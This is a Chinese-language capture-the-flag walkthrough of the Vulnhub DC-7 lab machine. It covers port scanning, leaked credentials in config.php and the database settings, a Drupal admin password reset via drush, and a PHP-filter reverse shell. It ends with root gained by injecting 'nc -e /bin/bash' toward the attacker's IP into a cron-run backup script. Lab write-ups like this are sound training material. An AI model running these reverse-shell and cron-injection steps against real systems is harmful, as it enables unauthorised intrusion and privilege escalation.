Vulnhub_DC-7 – 作者:gaoye02

Vulnhub提供线索在盒子外面

1611117730_6007b4a236afe243252b8.png!small

确定主机IP地址

1611116718_6007b0aee0ea6f6cac34c.png!small

扫描主机开放端口

root@kali:~# nmap -sV -T4 -A 192.168.10.130

1611116798_6007b0fe0bf60352a47f9.png!small

1611135167_6007f8bfe05ee28cabd92.png!small

对目录结构进行扫描

1611136247_6007fcf7d0c50201201fd.png!small1611136263_6007fd07761d1827d6e4f.png!small

搜索发现网站源码

1611136407_6007fd974c73555ab0234.png!small1611136453_6007fdc5b30ef9e39f342.png!small1611136457_6007fdc9459c7a95504ba.png!small。下载源码查看是否存在有用信息

最终在config.php

1611136561_6007fe31cae80528657a6.png!small发现了账号密码

1611136633_6007fe79890ac22042a1f.png!small通过SSH登录尝试

1611137189_600800a5800ceb7a38794.png!small

横向移动收集信息,

发现开放端口数据库3306

1611137591_600802373ccb69b55a0bb.png!small

在这个路径下

1611137749_600802d54f8f083380181.png!small

发现数据库密码

1611137718_600802b64d9b8b030c84a.png!small

‘database’ => ‘d7db’,
‘username’ => ‘db7user’,
‘password’ => ‘yNv3Po00’,
‘prefix’ => ”,

登录成功

1611138178_600804821964b62199e32.png!small

1、显示数据库列表。 
show databases; 
2、显示库中的数据表: 
use mysql;
show tables;

3、显示表中所有信息、

select * from users ;

虽然获取到了admin hash值,并没有解密成功

发现mail中的邮件

从邮件中发现

1.从最新一封与上一封邮件时间上比对,发现存在定时任务

2.发现脚本路径

1611140607_60080dff1d09f793d12dd.png!small1611140682_60080e4a56ad2325e67a5.png!small

脚本内容

1611140870_60080f06770764c5023ca.png!small

了解过后,发现drush 是管理drupal后台的命令

可以用来修改用户admin密码

修改密码需要到/var/www/html下使用drush

不然会找不到站点

1611141524_60081194d277cdd012f73.png!small

登录成功

1611142481_60081551357cc4afffb74.png!small

上传并启用drupal php filter

下载地址

https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

1611142641_600815f18ca4127a1eaa0.png!small

1611142648_600815f814d939cbd734a.png!small

启用模块

1611142706_60081632db83052c2e712.png!small

1611142784_60081680743078f6f781f.png!small

点击下面的install

启用成功

写入反弹shell

1611143040_6008178086452b46541bb.png!small

1611142994_6008175239f30cfad88e4.png!small

kali端监听

1611143063_600817972c689c456d9fd.png!small

在之前脚本中

1611143142_600817e65d52318a383cd.png!small

www-data用户拥有脚本写入权限

echo ” nc -e /bin/bash 192.168.10.155 8888″ >backups.sh

1611220609_60094681e8330a8ff58be.png!small

KALI监听,提权成功

1611220633_6009469996c1e0000d8f3.png!small

拿到flag

1611220704_600946e0dd028f194b94f.png!small

总结:善于发现一些网站标识;善于利用谷歌百度

来源:freebuf.com 2021-01-21 17:23:06 by: gaoye02

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论